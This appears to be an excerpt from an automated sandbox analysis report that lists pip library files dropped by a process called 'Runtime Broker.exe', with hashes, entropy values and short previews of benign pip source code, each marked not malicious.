C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\target_python.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4070
Entropy (8bit):	4.348721909799833
Encrypted:	false
SSDEEP:	48:kfzkE0QKRRaLuYuPqd3atqSKpclTqQPEfheGckjXQPewN08lsqrp4KKKfAzLGXNJ:kfzkQKjctatQpclTqQPXGi0uVlKQ3
MD5:	FA932A54E807EED1094AAA6EAEBC66ED
SHA1:	3BA88125621D049D45B8ECEB7BC88746FA453193
SHA-256:	3CAF0632CD79A52506086D7C4604C69AFC6F604F3E33958A9EE765E028A44D83
SHA-512:	198CCE65AFB441C760D3FF5887B07AF1A28F44EF2F34D000C71A38D29DBCF710B1837F6A698785482E922F3C5079DA525D051146918904F62357F6407CB288FF
Malicious:	false
Preview:	import sys..from pip._internal.utils.compatibility_tags import get_supported, version_info_to_nodot.from pip._internal.utils.misc import normalize_version_info.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional, Tuple.. from pip._vendor.packaging.tags import Tag...class TargetPython(object):.. """. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. """.. __slots__ = [. "_given_py_version_info",. "abis",. "implementation",. "platforms",. "py_version",. "py_version_info",. "_valid_tags",. ].. def __init__(. self,. platforms=None, # type: Optional[List[str]]. py_version_info=None, # type: Optional[Tuple[int, ...]]. abis=None, # type: Optional[List[str]]. implementation=None, # type: Optional[str]. ):. # type: (...) -> None. """. :

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\models\wheel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2772
Entropy (8bit):	4.648903971780538
Encrypted:	false
SSDEEP:	48:a1I6CWzkdZc/dBXuMcSwach57fg1BjjbpuHELIn5qrKSWdyGwTSUhZdlKxB3F:WzkQvuptBMBjn0HELq5OKT8NlKxB1
MD5:	A6457CAA2F9B57789BA5BF4ACDA438DB
SHA1:	F554C1E5F353EF8DCF9F1F04C443FFFED06B11F7
SHA-256:	1537F355BE1621B7C87A1C61765015BC28A5FCC434F96E38A32379E9C13A3477
SHA-512:	E3CF99A0A618D3F591696C4B9815FCF28B3431B2639273039BE0916124631F41351D1322582E03EAD7D9E229E0A800189647AAA480CD2CBF7C352640376D3938
Malicious:	false
Preview:	"""Represents a wheel file and provides access to the various parts of the.name that have meaning..""".import re..from pip._vendor.packaging.tags import Tag..from pip._internal.exceptions import InvalidWheelFilename.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List...class Wheel(object):. """A wheel file""".. wheel_file_re = re.compile(. r"""^(?P<namever>(?P<name>.+?)-(?P<ver>.?)). ((-(?P<build>\d[^-]?))?-(?P<pyver>.+?)-(?P<abi>.+?)-(?P<plat>.+?). \.whl\|\.dist-info)$""",. re.VERBOSE. ).. def __init__(self, filename):. # type: (str) -> None. """. :raises InvalidWheelFilename: when the filename is invalid for a wheel. """. wheel_info = self.wheel_file_re.match(filename). if not wheel_info:. raise InvalidWheelFilename(. "{} is not a valid wheel filename.".format(filename). ). self.filename = filename.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	50
Entropy (8bit):	4.1288840705376355
Encrypted:	false
SSDEEP:	3:5WFVQtGSKH4F0MzDv:YQtG5YiMfv
MD5:	3893F116D94097C4AE72769A5F7C21F7
SHA1:	CC7B633895C11040D0B99E7D0575B1D031652035
SHA-256:	8DFE93B799D5FFBCE401106B2A88C85C8B607A3BE87A054954A51B8406B92287
SHA-512:	924BC4A7222FC638FC8FAB4A6E7AEA876E25DCD355AFF628AA21A77BA0ECE90E774FA75D1797CFE688B7129626AAE395662489419AD53CAB4A842367FE97BCB8
Malicious:	false
Preview:	"""Contains purely network-related utilities..""".

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\auth.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	11652
Entropy (8bit):	4.391840377454487
Encrypted:	false
SSDEEP:	192:exdUk2I35xajuyLnyqcPR3LfW7M0IQjStFuhJKT2t+X8aD4lZ:exiI3rNyL8PlL4Sno42Z
MD5:	1D848F1BA7996C79BD1738709A71DD68
SHA1:	4FADBFD80025340FA25762B992A6451CDDCBC793
SHA-256:	9ED1FB923CB57FA388D0EF2CF119DCAA1CA3C2288D90C0A1255141F4F2273F4F
SHA-512:	A3E8E6170A314558DC741AD3D7C5FF3133A8837123BD966529B9335E0703B1017DA676E4D1447DE1D0CB411E2E47EFF787F249BC8262B476FD99E172CD3302AC
Malicious:	false
Preview:	"""Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests.."""..import logging..from pip._vendor.requests.auth import AuthBase, HTTPBasicAuth.from pip._vendor.requests.utils import get_netrc_auth.from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.utils.misc import (. ask,. ask_input,. ask_password,. remove_auth_from_url,. split_auth_netloc_from_url,.).from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, List, Optional, Tuple.. from pip._vendor.requests.models import Request, Response.. from pip._internal.vcs.versioncontrol import AuthInfo.. Credentials = Tuple[str, str, str]..logger = logging.getLogger(__name__)..try:. import keyring # noqa.except ImportError:. keyring = None.except Exception as exc:. logger.warning(. "Keyring is skipped due to an e

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\cache.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2329
Entropy (8bit):	4.609818803491163
Encrypted:	false
SSDEEP:	48:T6CfQv7zkaCd2VI/X60Zb9JRgcr9qyMGqzErE03p5GlSp54vczup5N:eCKzkaCd2Vwd9LgcRqy5EESci
MD5:	A1FADCD457C594B4A8EA9AD3E5B6B134
SHA1:	D69434B07062F9F7F25AF246F26B9FFC4F5F70D8
SHA-256:	EABA417EBAF3AFD49A072EFF00CD44507D6948562AD695C27ED32A93ED649104
SHA-512:	874373CCD8179A0F48E3990E7C3483A58EB52119651A1EB690DE6F5825A8E9C2BAAFFCDD29010D776C303655F00425DF35DB847A2D3EA33DA6194E2769727911
Malicious:	false
Preview:	"""HTTP cache implementation.."""..import os.from contextlib import contextmanager..from pip._vendor.cachecontrol.cache import BaseCache.from pip._vendor.cachecontrol.caches import FileCache.from pip._vendor.requests.models import Response..from pip._internal.utils.filesystem import adjacent_tmp_file, replace.from pip._internal.utils.misc import ensure_dir.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Iterator, Optional...def is_from_cache(response):. # type: (Response) -> bool. return getattr(response, "from_cache", False)...@contextmanager.def suppressed_cache_errors():. # type: () -> Iterator[None]. """If we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. """. try:. yield. except (OSError, IOError):. pass...class SafeFileCache(BaseCache):. """. A file based cache which is safe to use even when the target directory may. no

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\download.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6401
Entropy (8bit):	4.573670636995706
Encrypted:	false
SSDEEP:	96:2p5izkmNKQe8aX0VXmO8PiaPwD7iZ5dyAswMNFFO9BEdH11sweugsMz5H11swcP4:2zakmLcAmvJZiLBU9q5Gr
MD5:	C3AA17D3BA49F33D8861091B2621CCFB
SHA1:	10FDE1DC0BA84EB0503C3CFEBE039898FA68FD6B
SHA-256:	99C9A35912853B074BEA78A2CF19B4002BFDB5D7F4E9339804AFF163897FDDCE
SHA-512:	5CBCD6276D953A5E97D1C0877F40089F7B2E899872CCAD0AF04FACE4D2DA3E4B9DDA013E6499555332D34779FCBCD9968470F78BDCA099E4E84A55737DFCA1A3
Malicious:	false
Preview:	"""Download files with progress indicators..""".import cgi.import logging.import mimetypes.import os..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE..from pip._internal.cli.progress_bars import DownloadProgressProvider.from pip._internal.exceptions import NetworkConnectionError.from pip._internal.models.index import PyPI.from pip._internal.network.cache import is_from_cache.from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks.from pip._internal.utils.misc import format_size, redact_auth_from_url, splitext.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Iterable, Optional, Tuple.. from pip._vendor.requests.models import Response.. from pip._internal.models.link import Link. from pip._internal.network.session import PipSession..logger = logging.getLogger(__name__)...def _get_http_response_size(resp):. # type: (Response) -> Optional[int]. try:. return int(resp.headers['

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\lazy_wheel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	8121
Entropy (8bit):	4.5540587494747164
Encrypted:	false
SSDEEP:	96:NJ2ztE8SJp8FBQpvuVyY8eHPX410DtFnbSRutBcNC+WU4PxbZwi9/Ql:zWtBWKFuuVM0XymW8L+zC9/Y
MD5:	0D63CCA3EA8C5406018E1B60BC284722
SHA1:	8F2813974D65A3D1A78C4092FAA345A430A61446
SHA-256:	A3C0C3E15A2826F649D927C1B190C8E22F3978E34221340A2F275F92536BA21D
SHA-512:	85AF4EB8CDF3497C05A75F486A272F85A102BDA4AD17D1C7AD7053C61FA890A97D0EE4A9E0A1F0F3A4B196E2CBF0F8FD333CE704650FE3F322AA8D6515A47796
Malicious:	false
Preview:	"""Lazy ZIP over HTTP"""..__all__ = ['HTTPRangeRequestUnsupported', 'dist_from_wheel_url']..from bisect import bisect_left, bisect_right.from contextlib import contextmanager.from tempfile import NamedTemporaryFile.from zipfile import BadZipfile, ZipFile..from pip._vendor.requests.models import CONTENT_CHUNK_SIZE.from pip._vendor.six.moves import range..from pip._internal.network.utils import HEADERS, raise_for_status, response_chunks.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.wheel import pkg_resources_distribution_for_wheel..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, Iterator, List, Optional, Tuple.. from pip._vendor.pkg_resources import Distribution. from pip._vendor.requests.models import Response.. from pip._internal.network.session import PipSession...class HTTPRangeRequestUnsupported(Exception):. pass...def dist_from_wheel_url(name, url, session):. # type: (str, str, PipSession) -> Distribution. """Return a

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\session.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	15449
Entropy (8bit):	4.550213137789438
Encrypted:	false
SSDEEP:	384:yuS2C6IfvzBFStXvZ5alU6Hg5cNohFNHYbMs3S3NxOE2BjQcFE:yb2C9fvZuqNkB3jOhjQcS
MD5:	1D3ABBAA092BA42F66A13DCE1BD191B4
SHA1:	FFC69BE2AEC804214F904B47430DCEAEB3E2B207
SHA-256:	76838553595EA7A3231C14BF1F5015991CDCC04B3BCDC5DB26DB1FBBB5DC832D
SHA-512:	B60E201E2FFAFB2A50B7974670ABCA2CFBB3B858725D4CB75270FDDDEB32CDA8A950CCF3642358179284D1B89DAFC21B2B84CA6E8CB4C055F4DBF5F9590894D2
Malicious:	false
Preview:	"""PipSession and supporting code, containing all pip-specific.network request configuration and behavior.."""..# The following comment should be removed at some point in the future..# mypy: disallow-untyped-defs=False..import email.utils.import json.import logging.import mimetypes.import os.import platform.import sys.import warnings..from pip._vendor import requests, six, urllib3.from pip._vendor.cachecontrol import CacheControlAdapter.from pip._vendor.requests.adapters import BaseAdapter, HTTPAdapter.from pip._vendor.requests.models import Response.from pip._vendor.requests.structures import CaseInsensitiveDict.from pip._vendor.six.moves.urllib import parse as urllib_parse.from pip._vendor.urllib3.exceptions import InsecureRequestWarning..from pip import __version__.from pip._internal.network.auth import MultiDomainBasicAuth.from pip._internal.network.cache import SafeFileCache..# Import ssl from compat so the initial import occurs in only one place..from pip._internal.utils.compat i

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\utils.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4172
Entropy (8bit):	4.5129055211850195
Encrypted:	false
SSDEEP:	96:PJzkQmdmk/IlIqS8JzqElD2u/u5v8yqQl0+Ha+IIIbgmoj0:PJkQmYkF8J20DJmZ8yqQl0+HauJ0
MD5:	CA38055465BFAF4ED2208603D152596E
SHA1:	822CCA18B10B237F9FD97E3B0410E47DCC35C771
SHA-256:	64F1E0EEEE8311C83612F20B21D3C40A7BCF2E9DB538F1F135599E5DF332FA7D
SHA-512:	399254BD7F4D2158725B5105380DAC915029AEDBFD71E0433F346BF28A29324C2E74F93822F29EAA944255C553351A07E1E4AA96FD8958515954382650EBF5F2
Malicious:	false
Preview:	from pip._vendor.requests.models import CONTENT_CHUNK_SIZE, Response..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Dict, Iterator..# The following comments and HTTP headers were originally added by.# Donald Stufft in git commit 22c562429a61bb77172039e480873fb239dd8c03..#.# We use Accept-Encoding: identity here because requests defaults to.# accepting compressed responses. This breaks in a variety of ways.# depending on how the server is configured..# - Some servers will notice that the file isn't a compressible file.# and will leave the file alone and with an empty Content-Encoding.# - Some servers will notice that the file is already compressed and.# will leave the file alone, adding a Content-Encoding: gzip header.# - Some servers won't notice anything at all and will take a file.# that's already been compressed and compress it again, and set.# the Content-E

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\network\xmlrpc.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1883
Entropy (8bit):	4.618213723822376
Encrypted:	false
SSDEEP:	48:ybt43s1yzzk76+/16em1MA+uiAfKSrbOWh:a+3s+zk2+d6eWMzuiApbOWh
MD5:	2DDAFF28E7FC568DD7A3F171A9D16F27
SHA1:	964178FA3E822793E8C8C6071028CEB293C77B19
SHA-256:	E069DA4012412B272EC964AD458522F77926BFBD17A28B4B7F13B2980B0FE123
SHA-512:	26D0A435AB5292EEA4E860B4BBB1EFFAFA8EEB87000835B07A2021177E5B0C3316CE2EA3690B7DAB0EE244BA9526995F07AA92F55015E56731719E37BE5BA511
Malicious:	false
Preview:	"""xmlrpclib.Transport implementation."""..import logging..# NOTE: XMLRPC Client is not annotated in typeshed as on 2017-07-17, which is.# why we ignore the type on this import.from pip._vendor.six.moves import xmlrpc_client # type: ignore.from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.exceptions import NetworkConnectionError.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Dict.. from pip._internal.network.session import PipSession...logger = logging.getLogger(__name__)...class PipXmlrpcTransport(xmlrpc_client.Transport):. """Provide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. """.. def __init__(self, index_url, session, use_datetime=False):. # type: (str, PipSession, bool) -> None. xmlrpc_client.Transport.__init__(self, use_datetime). index_parts = urllib_parse.urlparse(i

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\build\metadata.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1255
Entropy (8bit):	4.720004786721449
Encrypted:	false
SSDEEP:	24:Ab0HQNPAJVezkiRJJDVDwgB6ixbZjpmlLCGIpFtH+MH5lp0y2ViX/P6fmeVhh:AnlzkubZjpml+vfWy27fPhh
MD5:	818AB3EA63F881230603E3CA03DAB6E5
SHA1:	CBF2873BC0F9BF45BB38ACDD664807A8838860CC
SHA-256:	9577118679CDDBE7F8F5D60135FD7F34B90767EB3EE0E3D5EED08EC8926667DE
SHA-512:	4F237C48D5FF3E61B5CA4072FDEC8F418694560239D79C990CB04BDF914C5CE8281079129A7A00F080251553BC1487C7DAF518DB90ACFF8107CA80F7BA51C2B3
Malicious:	false
Preview:	"""Metadata generation logic for source distributions.."""..import os..from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from pip._vendor.pep517.wrappers import Pep517HookCaller.. from pip._internal.build_env import BuildEnvironment...def generate_metadata(build_env, backend):. # type: (BuildEnvironment, Pep517HookCaller) -> str. """Generate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(. kind="modern-metadata", globally_managed=True. ).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that Pep517HookCaller implements a fallback for. # prepare_metadata_for_build_wheel, so we don't have to. # consider the possibility that this hook doesn't exist.. runner = runner_with_sp

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\build\metadata_legacy.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2011
Entropy (8bit):	4.609037579099912
Encrypted:	false
SSDEEP:	48:AyFZnByzk/54SYE9s6KaFh48Wm9m/bFY+tEKij31RJ5i:AyFBozkGSrFC8WmGbFY+tPihRO
MD5:	3C71E77F39E9971C72D7440F522F2490
SHA1:	FA544C525B4CE27D8097AA913BAD34CDC36F20F6
SHA-256:	560CC14E4F276883BCFBC37F89F11817B640C56503869856548695959D85A983
SHA-512:	1B16214EB957D95739E9E0F0459BF1CB0A9D2DD318E1A97591DCB0E9EAC06EDC63F6922251892C1B3922F6FBB9D4DB3BD6BAA169EF8C94A43869BBE567B941AA
Malicious:	false
Preview:	"""Metadata generation logic for legacy source distributions.."""..import logging.import os..from pip._internal.exceptions import InstallationError.from pip._internal.utils.setuptools_build import make_setuptools_egg_info_args.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from pip._internal.build_env import BuildEnvironment..logger = logging.getLogger(__name__)...def _find_egg_info(directory):. # type: (str) -> str. """Find an .egg-info subdirectory in `directory`.. """. filenames = [. f for f in os.listdir(directory) if f.endswith(".egg-info"). ].. if not filenames:. raise InstallationError(. "No .egg-info directory found in {}".format(directory). ).. if len(filenames) > 1:. raise InstallationError(. "More than one .egg-info directory found in {}".format(.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\build\wheel.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1466
Entropy (8bit):	4.682852256252541
Encrypted:	false
SSDEEP:	24:iPAezkveRJJJV9hVaqo8VDS2dT+Nz6tMUBL9WVhISWG/P6R2TBN9SGEhL:ezko9Haqo8Ve2dTKz6GM94hQ7ET37EhL
MD5:	C6F6D01A93DF4880CB41D8CB66F73F8C
SHA1:	9630AB948305AD60F42A7C6866B71FD8BA3C5590
SHA-256:	61AD22F3FBB37ECB1D376BE8ACE57334961B0185532D49D266298215D3F817BC
SHA-512:	5A35BE548E2EF6DC6DA5F28EA185F4EFDA102C35359BA654028DCB28EFF7F6F7FCC88963F79D76A21B17BC098E175270BD1E489E5661F5A82B5AC4E26D82EC5E
Malicious:	false
Preview:	import logging.import os..from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional.. from pip._vendor.pep517.wrappers import Pep517HookCaller..logger = logging.getLogger(__name__)...def build_wheel_pep517(. name, # type: str. backend, # type: Pep517HookCaller. metadata_directory, # type: str. build_options, # type: List[str]. tempd, # type: str.):. # type: (...) -> Optional[str]. """Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. if build_options:. # PEP 517 does not support --build-options. logger.error('Cannot build wheel for %s using PEP 517 when '. '--build-option is present', name). return None. try:. logger.debug('Destination dir

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\build\wheel_legacy.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3347
Entropy (8bit):	4.620113808358246
Encrypted:	false
SSDEEP:	96:xezkY+HnhyJA6Y90udz+PMw9kmO8tS2QmOoFVg9:wkEJAR2uNZwLVg9
MD5:	F3C5A51616532543729A47DD5A52AC31
SHA1:	EFA27F1917CFE9B0361DDF99D3685A6404A624ED
SHA-256:	F429D3A5CDB9020BE5F4C9CC82B5671D4593949DEE9BC695E26F5D6C67461E2D
SHA-512:	9DAED2FB5AAE7FA5A5E6A8DB9B52761056E46B803575E27095B2AFC4974C0F13EE9B863DD75303A1012619C66CF744DBBA2A3E54827E5378DB061E9889D0E65A
Malicious:	false
Preview:	import logging.import os.path..from pip._internal.cli.spinners import open_spinner.from pip._internal.utils.setuptools_build import make_setuptools_bdist_wheel_args.from pip._internal.utils.subprocess import (. LOG_DIVIDER,. call_subprocess,. format_command_args,.).from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional, Text..logger = logging.getLogger(__name__)...def format_command_result(. command_args, # type: List[str]. command_output, # type: Text.):. # type: (...) -> str. """Format command information for logging.""". command_desc = format_command_args(command_args). text = 'Command arguments: {}\n'.format(command_desc).. if not command_output:. text += 'Command output: None'. elif logger.getEffectiveLevel() > logging.DEBUG:. text += 'Command output: [use --verbose to show]'. else:. if not command_output.endswith('\n'):. command_output += '\n'.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\check.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5216
Entropy (8bit):	4.611948525349204
Encrypted:	false
SSDEEP:	96:kWHvW5xzOg/vLXT6r8CbYzEzKRj60yPG4sXnmJfFLEu/ZDMqUj7/JDRoRDQEJW:kW6ROUvLGr3YTby+LkQ/JdmDQGW
MD5:	45440C0883B1B8F32FBD0CBD417820F7
SHA1:	4BF0375F1C870939B64D4FB195A0801900D8F4F7
SHA-256:	10F356710C9449CDFFA5AFFA369BFF988E6C5D9E73A91AE693433AED85620C86
SHA-512:	893664ED519FC6D587A3D6BE36E3850DA91D8F3FA4424D11649F5DF86437DDAE9E8B836EF34BA162F092A316A7B6785A895CB087F60A18CAF4A60E518B7B493F
Malicious:	false
Preview:	"""Validation of dependencies of packages."""..import logging.from collections import namedtuple..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.pkg_resources import RequirementParseError..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.utils.misc import get_installed_distributions.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..logger = logging.getLogger(__name__)..if MYPY_CHECK_RUNNING:. from typing import Any, Callable, Dict, List, Optional, Set, Tuple.. from pip._internal.req.req_install import InstallRequirement.. # Shorthands. PackageSet = Dict[str, 'PackageDetails']. Missing = Tuple[str, Any]. Conflicting = Tuple[str, str, Any].. MissingDict = Dict[str, List[Missing]]. ConflictingDict = Dict[str, List[Conflicting]]. CheckResult = Tuple[MissingDict, ConflictingDict]. ConflictDetails = Tuple[PackageSet, CheckResult]..PackageDetails = namedtuple('PackageDetails'

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\freeze.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	10411
Entropy (8bit):	4.115949565508101
Encrypted:	false
SSDEEP:	192:xkfhvhbdx9ZVMAzMQMFYD8uD2BBVbF5KzHrgCr7TlZB4m5tdZ:cBdtVMZQj8uwyrgCr7TlZBtdZ
MD5:	59F3CA9524CC49322954EF53DE4660A6
SHA1:	5DE09CC4701F659913CCFAB82C11E0EA3F6B5F09
SHA-256:	DF99A736D51887061BFCB8A8A354711C4803EC4AA6DCA52A38E27A450413FFB6
SHA-512:	E99844B3FA97AA9BD94444DBFF4C2C7B4B01FA4C6A060B2085A58476BD1F344D324C7B32C6BABE8FDC07D912DD92040375BDD462DA1E1465B973961AB40F47A5
Malicious:	false
Preview:	from __future__ import absolute_import..import collections.import logging.import os..from pip._vendor import six.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.pkg_resources import RequirementParseError..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_file import COMMENT_RE.from pip._internal.utils.direct_url_helpers import (. direct_url_as_pep440_direct_reference,. dist_get_direct_url,.).from pip._internal.utils.misc import dist_is_editable, get_installed_distributions.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import (. Container,. Dict,. Iterable,. Iterator,. List,. Optional,. Set,. Tuple,. Union,. ).. from pip._vendor.pkg_resources import Distribution, Requirement.. from pip.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\install\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	51
Entropy (8bit):	4.155090479515533
Encrypted:	false
SSDEEP:	3:d/IF7CL5Dv:RI5CLdv
MD5:	C6F771F71FE2E186FB048050F4D2E467
SHA1:	C72C58E6CD7763F27AC8041D54F6390149AFC48E
SHA-256:	997EE1C83D863413B69851A8903437D2BFC65EFED8FCF2DDB71714BF5E387BEB
SHA-512:	A2A8D3F7862E8260EBC53B6670830104DCCD73A6292E1ECEF40379A167BAC510F81A3583C3AFA0EAAF6632BE771DCC54BE22F00330938B42B70B331DC42A9A0F
Malicious:	false
Preview:	"""For modules related to installing packages..""".

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\install\editable_legacy.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	1488
Entropy (8bit):	4.637481157324737
Encrypted:	false
SSDEEP:	24:6NXae2vZHVY/vPXI4vezkvNYTavFEGLg9k9A8rUaqKxmaK8Za7+ZyIVoUC:iXaNvZ1MmzkoavJg9k9A8YaqQZyGC
MD5:	00254BA1D4CE35552F2F6C7F0B92D93A
SHA1:	F36FD91BA79388EF6D53772F2F7AC50E8D0627FA
SHA-256:	AC9FF1B36AAD0D48E9636FA7E9E62557266236829B3AD65766B62B7272042EDE
SHA-512:	1A6E66348E8581C51DD2122DEE7F1A919725D760B9E5011F8FA998C03DCEE619B66126C773E92CCF55BD51EAF50D4BCA761736ED71D1EB7FB4C475FD4DC246DD
Malicious:	false
Preview:	"""Legacy editable installation process, i.e. `setup.py develop`..""".import logging..from pip._internal.utils.logging import indent_log.from pip._internal.utils.setuptools_build import make_setuptools_develop_args.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional, Sequence.. from pip._internal.build_env import BuildEnvironment...logger = logging.getLogger(__name__)...def install_editable(. install_options, # type: List[str]. global_options, # type: Sequence[str]. prefix, # type: Optional[str]. home, # type: Optional[str]. use_user_site, # type: bool. name, # type: str. setup_py_path, # type: str. isolated, # type: bool. build_env, # type: BuildEnvironment. unpacked_source_directory, # type: str.):. # type: (...) -> None. """Install a package in editable mode. Most arguments are pass-through. to setuptools..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\install\legacy.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4281
Entropy (8bit):	4.404347956635553
Encrypted:	false
SSDEEP:	96:54OSwzkASy6Io8+oQ0T0XWehh+TC7qr1iX8To:eO1kzvGQ08iT0qr4XYo
MD5:	0B882C3FEFDFACB8AB9379F0670DC981
SHA1:	38D873D2158926886A30999B2CB654BC9FC77F12
SHA-256:	CEEDC6C39E1D807B65BB25B99FC8F9A8A70049C89D41726FA81F1F6F4A0B07EE
SHA-512:	1D45C7683AF3529B8D1D661401559710A46EE04991BCC6944BC502CEF28E45D20E153D20BAD756713B632100FA893415BB592934FDDCD5B6E7ED4C65E3D02290
Malicious:	false
Preview:	"""Legacy installation process, i.e. `setup.py install`.."""..import logging.import os.import sys.from distutils.util import change_root..from pip._internal.exceptions import InstallationError.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import ensure_dir.from pip._internal.utils.setuptools_build import make_setuptools_install_args.from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import List, Optional, Sequence.. from pip._internal.build_env import BuildEnvironment. from pip._internal.models.scheme import Scheme...logger = logging.getLogger(__name__)...class LegacyInstallFailure(Exception):. def __init__(self):. # type: () -> None. self.parent = sys.exc_info()...def install(. install_options, # type: List[str]. global_options, # type: Sequence[str]

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\install\wheel.py Download File
